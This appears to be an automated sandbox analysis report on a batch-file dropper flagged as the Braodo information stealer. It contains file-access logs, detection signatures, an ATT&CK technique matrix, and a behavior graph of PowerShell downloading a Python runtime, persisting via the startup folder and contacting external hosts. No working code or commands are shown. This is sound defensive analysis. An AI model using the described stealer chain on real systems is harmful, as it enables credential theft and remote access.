          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\copyreg.cpython-310.pyc.1784794158256 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\base64.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\base64.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\base64.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\base64.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\base64.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\base64.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\base64.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\base64.cpython-310.pyc.1784799020400 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\struct.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\struct.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\struct.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\struct.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\struct.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\struct.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\struct.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\struct.cpython-310.pyc.1784799031712 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\pickle.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\pickle.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\pickle.cpython-310.pyc.1784817049184 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\_compat_pickle.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\_compat_pickle.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_compat_pickle.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\_compat_pickle.cpython-310.pyc.1784799998512 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\pythonwin VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\ast.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\ast.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\ast.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\ast.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\ast.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\ast.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\ast.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\ast.cpython-310.pyc.1784817055232 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\contextlib.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\contextlib.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\contextlib.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\contextlib.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\contextlib.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\contextlib.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\contextlib.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\contextlib.cpython-310.pyc.1784794160432 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\__pycache__\__init__.cpython-310.pyc.1784825455520 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-310.pyc.1784825455664 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\_mode_ecb.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\_mode_ecb.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Braodo
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7052, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Braodo
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7052, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information21
          Scripting          		Valid Accounts1
          Command and Scripting Interpreter          		21
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping11
          Security Software Discovery          		Remote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          PowerShell          		2
          Registry Run Keys / Startup Folder          		2
          Registry Run Keys / Startup Folder          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          DLL Side-Loading          		1
          DLL Side-Loading          		11
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture3
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          System Network Configuration Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640885 Sample: T3-03-17.bat Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 44 www.dropbox.com 2->44 46 www-env.dropbox-dns.com 2->46 48 5 other IPs or domains 2->48 62 Suricata IDS alerts for network traffic 2->62 64 Yara detected Braodo 2->64 66 Yara detected Powershell download and execute 2->66 68 7 other signatures 2->68 9 cmd.exe 1 2->9         started        12 cmd.exe 1 2->12         started        signatures3 process4 signatures5 70 Suspicious powershell command line found 9->70 72 Tries to download and execute files (via powershell) 9->72 14 powershell.exe 14 1006 9->14         started        19 conhost.exe 9->19         started        21 powershell.exe 12 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 52 github.com 140.82.121.3, 443, 49721 GITHUBUS United States 14->52 54 raw.githubusercontent.com 185.199.108.133, 443, 49722 FASTLYUS Netherlands 14->54 56 2 other IPs or domains 14->56 36 C:\Users\Public\Document\vcruntime140_1.dll, PE32+ 14->36 dropped 38 C:\Users\Public\Document\vcruntime140.dll, PE32+ 14->38 dropped 40 C:\Users\Public\Document\python310.dll, PE32+ 14->40 dropped 42 597 other files (42 malicious) 14->42 dropped 58 Drops script or batch files to the startup folder 14->58 60 Powershell drops PE file 14->60 25 python.exe 382 14->25         started        28 conhost.exe 14->28         started        30 conhost.exe 21->30         started        file8 signatures9 process10 dnsIp11 50 ipinfo.io 34.117.59.81 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 25->50 32 cmd.exe 25->32         started        34 cmd.exe 25->34         started        process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.